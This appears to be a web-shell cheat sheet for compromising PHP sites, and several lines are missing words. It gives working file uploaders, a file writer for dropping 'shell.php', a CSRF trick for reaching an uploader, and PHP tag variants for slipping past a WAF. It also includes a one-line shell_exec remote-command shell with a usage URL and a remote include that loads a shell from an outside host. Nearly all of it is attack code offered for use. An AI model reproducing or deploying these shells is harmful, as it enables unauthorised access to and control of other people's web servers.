- Normal File Uploader
echo 'Uploader<br>';
echo '<form action="" method="post" enctype="multipart/form-data">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Success</b><br><br>';
}else {
echo '<b>Failed</b><br><br>';
- CSRF File Uploader
This uploader bypasses content length if the normal file uploader code is too long. To access this, open the file where you save it and do a CSRF with POST file value of
copy($_FILES['file']['tmp_name'], $_FILES['file']['name']);
This saves your file to the same directory of the uploader.
- File Get Contents
Will work if
is on. Upload this as up.php then open it. It will automatically generate a file named shell.php on the same directory.
- File Writer (link)
If you managed to make a file uploader but it doesn't work, maybe the site does not allow uploading. Some sites don't enable upload functions, hence
will not work. File writer works by using different command (fwrite
$a = $_POST['code'];
$file = fopen($_POST['file'],'w');
<form method="post" id="form">
<h2>File Writer</h2>
File Name<br><input type="text" name="file" placeholder="shell.php"><br>
Shell Code<br><textarea name="code" form="form" placeholder="Paste your shell here"></textarea><br>
<input type="submit" value="Write">
If all of the above fails or is blocked by WAF, try using other php notations.
a. <?php echo 'sample'; ?>
- normal one
b. <? echo 'sample'; ?>
- will work if short_open_tag is enabled
c. <% echo 'sample'; %>
- PHP < 7.0.0
d. <script language="php"> echo 'sample'; </script>
- PHP < 7.0.0
This shell is large >900kb. The size is large which gives room to more functionality. But more functionality means more functions used, and more functions used results to more
which might result again to error in shell or blocked by WAF.
I think this is a "so called" bypass shell.It is light weight, around ~70kb. I think it is based on wso.php web shell
File size is ~14kb and bypasses as well some WAFs while uploading
- RCE shell
I use this when we need to upload a shell with very small file size
This is a shorthand notation for
<?php echo shell_exec($_GET['1']);?>
. But note that this only works ifshell_exec
in phpinfo. To access this, just /shell.php?1=whoami
- Include
Used for bypassing file size as well due to its small size.
<?php include('https://somewebshell.com/shell.txt');?>
This will work only if
is ON in phpinfo.